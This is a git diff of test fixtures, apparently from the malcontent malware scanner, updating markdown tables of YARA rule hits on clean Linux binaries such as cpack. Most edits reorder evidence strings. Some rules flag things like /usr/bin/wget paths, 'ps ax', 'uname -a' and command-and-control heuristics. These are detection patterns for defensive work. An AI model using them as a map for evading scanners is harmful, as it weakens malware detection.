[/etc/fallback](https://github.com/search?q=%2Fetc%2Ffallback&type=code)
[/etc/fonts.xml](https://github.com/search?q=%2Fetc%2Ffonts.xml&type=code)
[/etc/host.conf](https://github.com/search?q=%2Fetc%2Fhost.conf&type=code)
[/etc/hosts](https://github.com/search?q=%2Fetc%2Fhosts&type=code)
[/etc/localtime](https://github.com/search?q=%2Fetc%2Flocaltime&type=code)
[/etc/lsb-release](https://github.com/search?q=%2Fetc%2Flsb-release&type=code)
[/etc/nsswitch.conf](https://github.com/search?q=%2Fetc%2Fnsswitch.conf&type=code)
[/etc/os-release](https://github.com/search?q=%2Fetc%2Fos-release&type=code)
[/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code)
[/etc/ssl/cert.pem](https://github.com/search?q=%2Fetc%2Fssl%2Fcert.pem&type=code)
[/etc/ssl/certs](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts&type=code)
[/etc/svc.conf](https://github.com/search?q=%2Fetc%2Fsvc.conf&type=code)
[/etc/system](https://github.com/search?q=%2Fetc%2Fsystem&type=code)
[/etc/timezone](https://github.com/search?q=%2Fetc%2Ftimezone&type=code)
[/etc/vulkan/icd.d](https://github.com/search?q=%2Fetc%2Fvulkan%2Ficd.d&type=code)
[/etc/xml/catalog](https://github.com/search?q=%2Fetc%2Fxml%2Fcatalog&type=code) | +| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [mount](https://github.com/search?q=mount&type=code)
[-o](https://github.com/search?q=-o&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/chromium/native-messaging-hosts](https://github.com/search?q=%2Fetc%2Fchromium%2Fnative-messaging-hosts&type=code)
[/etc/ati/amdpcsdb.default](https://github.com/search?q=%2Fetc%2Fati%2Famdpcsdb.default&type=code)
[/etc/chromium/policies](https://github.com/search?q=%2Fetc%2Fchromium%2Fpolicies&type=code)
[/etc/nsswitch.conf](https://github.com/search?q=%2Fetc%2Fnsswitch.conf&type=code)
[/etc/ssl/cert.pem](https://github.com/search?q=%2Fetc%2Fssl%2Fcert.pem&type=code)
[/etc/vulkan/icd.d](https://github.com/search?q=%2Fetc%2Fvulkan%2Ficd.d&type=code)
[/etc/asound.conf](https://github.com/search?q=%2Fetc%2Fasound.conf&type=code)
[/etc/lsb-release](https://github.com/search?q=%2Fetc%2Flsb-release&type=code)
[/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code)
[/etc/xml/catalog](https://github.com/search?q=%2Fetc%2Fxml%2Fcatalog&type=code)
[/etc/os-release](https://github.com/search?q=%2Fetc%2Fos-release&type=code)
[/etc/fonts.xml](https://github.com/search?q=%2Fetc%2Ffonts.xml&type=code)
[/etc/host.conf](https://github.com/search?q=%2Fetc%2Fhost.conf&type=code)
[/etc/localtime](https://github.com/search?q=%2Fetc%2Flocaltime&type=code)
[/etc/ssl/certs](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts&type=code)
[/etc/fallback](https://github.com/search?q=%2Fetc%2Ffallback&type=code)
[/etc/svc.conf](https://github.com/search?q=%2Fetc%2Fsvc.conf&type=code)
[/etc/timezone](https://github.com/search?q=%2Fetc%2Ftimezone&type=code)
[/etc/catalog](https://github.com/search?q=%2Fetc%2Fcatalog&type=code)
[/etc/system](https://github.com/search?q=%2Fetc%2Fsystem&type=code)
[/etc/hosts](https://github.com/search?q=%2Fetc%2Fhosts&type=code) | | LOW | [fs/path/etc_resolv.conf](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-resolv.conf.yara#etc_resolv_conf) | accesses DNS resolver configuration | [/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code) | | LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/privacy/](https://github.com/search?q=%2Fhome%2Fprivacy%2F&type=code) | | LOW | [fs/path/home_config](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home-config.yara#home_config_path) | path reference within ~/.config | [.config/pulse](https://github.com/search?q=.config%2Fpulse&type=code)
[/.config/user](https://github.com/search?q=%2F.config%2Fuser&type=code) | | LOW | [fs/path/usr_bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/wget](https://github.com/search?q=%2Fusr%2Fbin%2Fwget&type=code) | -| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/cache/fontconfig](https://github.com/search?q=%2Fvar%2Fcache%2Ffontconfig&type=code)
[/var/log/bluetooth/bluetooth_quality_report](https://github.com/search?q=%2Fvar%2Flog%2Fbluetooth%2Fbluetooth_quality_report&type=code)
[/var/log/bluetooth/log.bz2.old](https://github.com/search?q=%2Fvar%2Flog%2Fbluetooth%2Flog.bz2.old&type=code)
[/var/run/user](https://github.com/search?q=%2Fvar%2Frun%2Fuser&type=code)
[/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | +| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/log/bluetooth/bluetooth_quality_report](https://github.com/search?q=%2Fvar%2Flog%2Fbluetooth%2Fbluetooth_quality_report&type=code)
[/var/log/bluetooth/log.bz2.old](https://github.com/search?q=%2Fvar%2Flog%2Fbluetooth%2Flog.bz2.old&type=code)
[/var/cache/fontconfig](https://github.com/search?q=%2Fvar%2Fcache%2Ffontconfig&type=code)
[/var/run/user](https://github.com/search?q=%2Fvar%2Frun%2Fuser&type=code)
[/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | | LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | | LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir.yara#tempdir) | looks up location of temp directory | [TEMPDIR](https://github.com/search?q=TEMPDIR&type=code)
[TMPDIR](https://github.com/search?q=TMPDIR&type=code) | -| LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [TEMP](https://github.com/search?q=TEMP&type=code)
[getenv](https://github.com/search?q=getenv&type=code)
[temp](https://github.com/search?q=temp&type=code) | +| LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [getenv](https://github.com/search?q=getenv&type=code)
[TEMP](https://github.com/search?q=TEMP&type=code)
[temp](https://github.com/search?q=temp&type=code) | | LOW | [fs/tempdir/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir-create.yara#mkdtemp) | creates temporary directory | [mkdtemp](https://github.com/search?q=mkdtemp&type=code)
[temp dir](https://github.com/search?q=temp+dir&type=code) | +| LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir-create.yara#mkdtemp) | creates temporary directory | [temp dir](https://github.com/search?q=temp+dir&type=code)
[mkdtemp](https://github.com/search?q=mkdtemp&type=code) | | LOW | [fs/tempfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile.yara#mktemp) | creates temporary files | [tmpfile](https://github.com/search?q=tmpfile&type=code) | | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | | LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code) | @@ -164,7 +164,7 @@ | LOW | [net/http/auth](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/auth.yara#http_auth) | makes HTTP requests with basic authentication | [WWW-Authenticate](https://github.com/search?q=WWW-Authenticate&type=code)
[www-authenticate](https://github.com/search?q=www-authenticate&type=code) | | LOW | [net/http/oauth2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/oauth2.yara#oauth2) | supports OAuth2 | [oauth2](https://github.com/search?q=oauth2&type=code) | | LOW | [net/http/proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/proxy.yara#proxy_auth) | [use HTTP proxy that requires authentication](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Proxy-Authorization) | [Proxy-Authorization](https://github.com/search?q=Proxy-Authorization&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[Referer](https://github.com/search?q=Referer&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code)
[http.get](https://github.com/search?q=http.get&type=code)
[httpClose](https://github.com/search?q=httpClose&type=code)
[httpConnect](https://github.com/search?q=httpConnect&type=code)
[httpRequest](https://github.com/search?q=httpRequest&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [httpConnect](https://github.com/search?q=httpConnect&type=code)
[httpRequest](https://github.com/search?q=httpRequest&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code)
[httpClose](https://github.com/search?q=httpClose&type=code)
[http.get](https://github.com/search?q=http.get&type=code)
[HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[Referer](https://github.com/search?q=Referer&type=code) | | LOW | [net/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip.yara#packets) | access the internet | [invalid packet](https://github.com/search?q=invalid+packet&type=code) | | LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | | LOW | [net/resolve/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#cannot_resolve) | resolve network host name to IP address | [cannot resolve](https://github.com/search?q=cannot+resolve&type=code) | @@ -172,13 +172,13 @@ | LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | | LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [client_address_spac](https://github.com/search?q=client_address_spac&type=code)
[getpeername](https://github.com/search?q=getpeername&type=code) | | LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvfrom](https://github.com/search?q=recvfrom&type=code)
[recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [_send](https://github.com/search?q=_send&type=code)
[sendmmsg](https://github.com/search?q=sendmmsg&type=code)
[sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmmsg](https://github.com/search?q=sendmmsg&type=code)
[sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code)
[_send](https://github.com/search?q=_send&type=code) | | LOW | [net/url/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle) | Handles URL strings | [URLContext](https://github.com/search?q=URLContext&type=code)
[new URL](https://github.com/search?q=new+URL&type=code) | -| LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#get_env_val) | Retrieve environment variable values | [env.COLORTERM](https://github.com/search?q=env.COLORTERM&type=code)
[env.ELECTRON](https://github.com/search?q=env.ELECTRON&type=code)
[env.FORCE](https://github.com/search?q=env.FORCE&type=code)
[env.NODE](https://github.com/search?q=env.NODE&type=code)
[env.ORIGINAL](https://github.com/search?q=env.ORIGINAL&type=code)
[env.TEAMCITY](https://github.com/search?q=env.TEAMCITY&type=code)
[env.TEMP](https://github.com/search?q=env.TEMP&type=code)
[env.TERM](https://github.com/search?q=env.TERM&type=code)
[env.TMP](https://github.com/search?q=env.TMP&type=code)
[env.TMUX](https://github.com/search?q=env.TMUX&type=code)
[env.USERPROFILE](https://github.com/search?q=env.USERPROFILE&type=code)
[env.XDG](https://github.com/search?q=env.XDG&type=code) | +| LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#get_env_val) | Retrieve environment variable values | [env.USERPROFILE](https://github.com/search?q=env.USERPROFILE&type=code)
[env.COLORTERM](https://github.com/search?q=env.COLORTERM&type=code)
[env.ELECTRON](https://github.com/search?q=env.ELECTRON&type=code)
[env.ORIGINAL](https://github.com/search?q=env.ORIGINAL&type=code)
[env.TEAMCITY](https://github.com/search?q=env.TEAMCITY&type=code)
[env.FORCE](https://github.com/search?q=env.FORCE&type=code)
[env.NODE](https://github.com/search?q=env.NODE&type=code)
[env.TEMP](https://github.com/search?q=env.TEMP&type=code)
[env.TERM](https://github.com/search?q=env.TERM&type=code)
[env.TMUX](https://github.com/search?q=env.TMUX&type=code)
[env.TMP](https://github.com/search?q=env.TMP&type=code)
[env.XDG](https://github.com/search?q=env.XDG&type=code) | | LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read) | reads from a file handle | [context.read()](https://github.com/search?q=context.read%28%29&type=code)
[reader.read()](https://github.com/search?q=reader.read%28%29&type=code)
[req.read()](https://github.com/search?q=req.read%28%29&type=code)
[self.read()](https://github.com/search?q=self.read%28%29&type=code)
[socket.read()](https://github.com/search?q=socket.read%28%29&type=code)
[stream.read()](https://github.com/search?q=stream.read%28%29&type=code)
[tail.read()](https://github.com/search?q=tail.read%28%29&type=code) | +| LOW | [os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read) | reads from a file handle | [context.read()](https://github.com/search?q=context.read%28%29&type=code)
[reader.read()](https://github.com/search?q=reader.read%28%29&type=code)
[socket.read()](https://github.com/search?q=socket.read%28%29&type=code)
[stream.read()](https://github.com/search?q=stream.read%28%29&type=code)
[self.read()](https://github.com/search?q=self.read%28%29&type=code)
[tail.read()](https://github.com/search?q=tail.read%28%29&type=code)
[req.read()](https://github.com/search?q=req.read%28%29&type=code) | | LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code) | -| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [_decoder.write(b)](https://github.com/search?q=_decoder.write%28b%29&type=code)
[_decoder.write(ret)](https://github.com/search?q=_decoder.write%28ret%29&type=code)
[_downstream.write(e)](https://github.com/search?q=_downstream.write%28e%29&type=code)
[decoder.write(chunk)](https://github.com/search?q=decoder.write%28chunk%29&type=code)
[decoder.write(data)](https://github.com/search?q=decoder.write%28data%29&type=code)
[dest.write(chunk)](https://github.com/search?q=dest.write%28chunk%29&type=code)
[output.write(errStack)](https://github.com/search?q=output.write%28errStack%29&type=code)
[output.write(line)](https://github.com/search?q=output.write%28line%29&type=code)
[output.write(result)](https://github.com/search?q=output.write%28result%29&type=code)
[output.write(stringToWrite)](https://github.com/search?q=output.write%28stringToWrite%29&type=code)
[pt.write(val)](https://github.com/search?q=pt.write%28val%29&type=code)
[self.write(prefix)](https://github.com/search?q=self.write%28prefix%29&type=code)
[stdout.write(s)](https://github.com/search?q=stdout.write%28s%29&type=code)
[stream.write(data)](https://github.com/search?q=stream.write%28data%29&type=code)
[stream.write(string)](https://github.com/search?q=stream.write%28string%29&type=code)
[streamWritable.write(chunk)](https://github.com/search?q=streamWritable.write%28chunk%29&type=code)
[this.write(buf)](https://github.com/search?q=this.write%28buf%29&type=code)
[this.write(data)](https://github.com/search?q=this.write%28data%29&type=code)
[this.write(response)](https://github.com/search?q=this.write%28response%29&type=code)
[writable.write(chunk)](https://github.com/search?q=writable.write%28chunk%29&type=code)
[writer.write(chunk)](https://github.com/search?q=writer.write%28chunk%29&type=code) | +| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [output.write(stringToWrite)](https://github.com/search?q=output.write%28stringToWrite%29&type=code)
[streamWritable.write(chunk)](https://github.com/search?q=streamWritable.write%28chunk%29&type=code)
[output.write(errStack)](https://github.com/search?q=output.write%28errStack%29&type=code)
[writable.write(chunk)](https://github.com/search?q=writable.write%28chunk%29&type=code)
[_downstream.write(e)](https://github.com/search?q=_downstream.write%28e%29&type=code)
[decoder.write(chunk)](https://github.com/search?q=decoder.write%28chunk%29&type=code)
[output.write(result)](https://github.com/search?q=output.write%28result%29&type=code)
[stream.write(string)](https://github.com/search?q=stream.write%28string%29&type=code)
[this.write(response)](https://github.com/search?q=this.write%28response%29&type=code)
[_decoder.write(ret)](https://github.com/search?q=_decoder.write%28ret%29&type=code)
[decoder.write(data)](https://github.com/search?q=decoder.write%28data%29&type=code)
[writer.write(chunk)](https://github.com/search?q=writer.write%28chunk%29&type=code)
[output.write(line)](https://github.com/search?q=output.write%28line%29&type=code)
[self.write(prefix)](https://github.com/search?q=self.write%28prefix%29&type=code)
[stream.write(data)](https://github.com/search?q=stream.write%28data%29&type=code)
[_decoder.write(b)](https://github.com/search?q=_decoder.write%28b%29&type=code)
[dest.write(chunk)](https://github.com/search?q=dest.write%28chunk%29&type=code)
[this.write(data)](https://github.com/search?q=this.write%28data%29&type=code)
[stdout.write(s)](https://github.com/search?q=stdout.write%28s%29&type=code)
[this.write(buf)](https://github.com/search?q=this.write%28buf%29&type=code)
[pt.write(val)](https://github.com/search?q=pt.write%28val%29&type=code) | | LOW | [os/kernel/netlink](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/netlink.yara#netlink) | communicate with kernel services | [netlink](https://github.com/search?q=netlink&type=code) | | LOW | [os/kernel/perfmon](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/perfmon.yara#perf_event_open) | set up performance monitoring | [perf_event_open](https://github.com/search?q=perf_event_open&type=code) | | LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md index fc838a67b..30a52a9ee 100644 --- a/tests/linux/clean/cpack.md +++ b/tests/linux/clean/cpack.md @@ -2,21 +2,21 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | $elf_head | -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[use_port](https://github.com/search?q=use_port&type=code) | +| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | | +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [local_ip](https://github.com/search?q=local_ip&type=code)
[use_port](https://github.com/search?q=use_port&type=code)
[Port](https://github.com/search?q=Port&type=code)
[IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code) | | MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [clientID](https://github.com/search?q=clientID&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [Darwin](https://github.com/search?q=Darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[https://](https://)
[macOS](https://github.com/search?q=macOS&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[Darwin](https://github.com/search?q=Darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code) | | MEDIUM | [crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#file_crypter) | Encrypts files | [cryptor](https://github.com/search?q=cryptor&type=code) | | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code)
[openssl](https://github.com/search?q=openssl&type=code) | -| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| MEDIUM | [data/base64/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-encode.yara#py_base64_encode) | encode base64 strings | [base64_encode](https://github.com/search?q=base64_encode&type=code) | +| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [py_base64_decode::base64_decode](https://github.com/search?q=py_base64_decode%3A%3Abase64_decode&type=code) | +| MEDIUM | [data/base64/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-encode.yara#py_base64_encode) | encode base64 strings | [py_base64_encode::base64_encode](https://github.com/search?q=py_base64_encode%3A%3Abase64_encode&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Chtml%3E&type=code) | -| MEDIUM | [data/embedded/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-zstd.yara#embedded_zstd) | [Contains compressed content in ZStandard format](https://github.com/facebook/zstd) | [(/](https://github.com/search?q=%28%B5%2F%FD&type=code) | +| MEDIUM | [data/embedded/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-zstd.yara#embedded_zstd) | [Contains compressed content in ZStandard format](https://github.com/facebook/zstd) | | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | -| MEDIUM | [discover/processes/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/processes/list.yara#ps_exec) | executes ps(1) for a list of processes | [#!](https://github.com/search?q=%23%21&type=code)
[ps ax](https://github.com/search?q=ps+ax&type=code) | +| MEDIUM | [discover/processes/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/processes/list.yara#ps_exec) | executes ps(1) for a list of processes | [ps ax](https://github.com/search?q=ps+ax&type=code)
[#!](https://github.com/search?q=%23%21&type=code) | | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname_a) | gets full system identification | [uname -a](https://github.com/search?q=uname+-a&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [N_125cmFunctionFunctionBlocker16StartCommandNameEv](https://github.com/search?q=N_125cmFunctionFunctionBlocker16StartCommandNameEv&type=code)
[StartupCommands](https://github.com/search?q=StartupCommands&type=code)
[_N_122cmBlockFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_122cmBlockFunctionBlocker16StartCommandNameEv&type=code)
[_N_122cmMacroFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_122cmMacroFunctionBlocker16StartCommandNameEv&type=code)
[_N_124cmForEachFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_124cmForEachFunctionBlocker16StartCommandNameEv&type=code)
[_ZN13cmSystemTools23s_RunCommandHideConsoleE](https://github.com/search?q=_ZN13cmSystemTools23s_RunCommandHideConsoleE&type=code)
[_ZN13cmSystemTools25s_DisableRunCommandOutputE](https://github.com/search?q=_ZN13cmSystemTools25s_DisableRunCommandOutputE&type=code)
[_ZNK19cmIfFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_ZNK19cmIfFunctionBlocker16StartCommandNameEv&type=code)
[_ZNK22cmWhileFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_ZNK22cmWhileFunctionBlocker16StartCommandNameEv&type=code)
[_ZZN12_GLOBAL__N_117TryRunCommandImpl18DoNotRunExecutableERKNSt7_](https://github.com/search?q=_ZZN12_GLOBAL__N_117TryRunCommandImpl18DoNotRunExecutableERKNSt7_&type=code)
[cmExecuteCommand](https://github.com/search?q=cmExecuteCommand&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [_ZZN12_GLOBAL__N_117TryRunCommandImpl18DoNotRunExecutableERKNSt7_](https://github.com/search?q=_ZZN12_GLOBAL__N_117TryRunCommandImpl18DoNotRunExecutableERKNSt7_&type=code)
[N_125cmFunctionFunctionBlocker16StartCommandNameEv](https://github.com/search?q=N_125cmFunctionFunctionBlocker16StartCommandNameEv&type=code)
[_N_124cmForEachFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_124cmForEachFunctionBlocker16StartCommandNameEv&type=code)
[_N_122cmBlockFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_122cmBlockFunctionBlocker16StartCommandNameEv&type=code)
[_N_122cmMacroFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_122cmMacroFunctionBlocker16StartCommandNameEv&type=code)
[_ZNK22cmWhileFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_ZNK22cmWhileFunctionBlocker16StartCommandNameEv&type=code)
[_ZN13cmSystemTools25s_DisableRunCommandOutputE](https://github.com/search?q=_ZN13cmSystemTools25s_DisableRunCommandOutputE&type=code)
[_ZNK19cmIfFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_ZNK19cmIfFunctionBlocker16StartCommandNameEv&type=code)
[_ZN13cmSystemTools23s_RunCommandHideConsoleE](https://github.com/search?q=_ZN13cmSystemTools23s_RunCommandHideConsoleE&type=code)
[cmExecuteCommand](https://github.com/search?q=cmExecuteCommand&type=code)
